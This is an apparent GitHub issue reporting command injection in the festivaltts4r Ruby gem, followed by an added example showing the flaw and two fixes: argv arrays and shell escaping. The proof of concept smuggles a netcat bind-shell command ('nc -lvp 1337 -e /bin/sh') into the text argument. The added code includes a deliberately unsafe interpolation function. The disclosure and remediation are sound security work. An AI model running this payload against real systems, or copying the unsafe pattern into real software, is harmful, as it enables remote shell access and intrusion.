Command Injection #1

Open
bcoles opened this issue Apr 22, 2016 · 0 comments
bcoles commented Apr 22, 2016

The to_speech and to_mp3 methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.

Proof of concept:

```ruby
#!/usr/bin/env ruby
require "rubygems"
require "festivaltts4r"

'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')
```

```
$ ./asdf.rb 
listening on [any] 1337 ...
```
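
The injection pattern reported above, next to two ways of closing it, as an added example that is not part of the original issue or of the festivaltts4r code. It assumes the gem interpolates the text inside double quotes in a shell command string; the method names, the Ruby one-liner standing in for the speech program, and the harmless payload are all constructed for illustration.

```ruby
require "open3"
require "rbconfig"
require "shellwords"

# Stand-in for the speech program so the example runs offline: a Ruby
# one-liner that copies stdin to stdout (assumption, not the gem's command).
CONSUMER = [RbConfig.ruby, "-e", "print STDIN.read"].freeze

# Constructed, harmless payload with the same shape as the one in the report:
# close the double quote, run a command, reopen the quote.
PAYLOAD = '";echo $((6*7));echo "x'

# Vulnerable pattern (assumed): text interpolated into a shell string.
# A single-string command with metacharacters is handed to /bin/sh -c.
def speak_unsafe(text)
  out, = Open3.capture2("echo \"#{text}\" | #{Shellwords.join(CONSUMER)}")
  out
end

# Fix 1: argv array, so no shell ever parses the text; it travels on stdin.
def speak_safe(text)
  out, = Open3.capture2(*CONSUMER, stdin_data: text)
  out
end

# Fix 2: if a shell pipeline is unavoidable, escape the text as one word.
def speak_escaped(text)
  cmd = "printf '%s' #{Shellwords.escape(text)} | #{Shellwords.join(CONSUMER)}"
  out, = Open3.capture2(cmd)
  out
end

if __FILE__ == $PROGRAM_NAME
  p speak_unsafe(PAYLOAD)   # the shell evaluates the arithmetic: injection
  p speak_safe(PAYLOAD)     # payload comes back as literal text
  p speak_escaped(PAYLOAD)  # payload comes back as literal text
end
```

The argv-array form is the stronger fix because correctness does not depend on every call site remembering to escape.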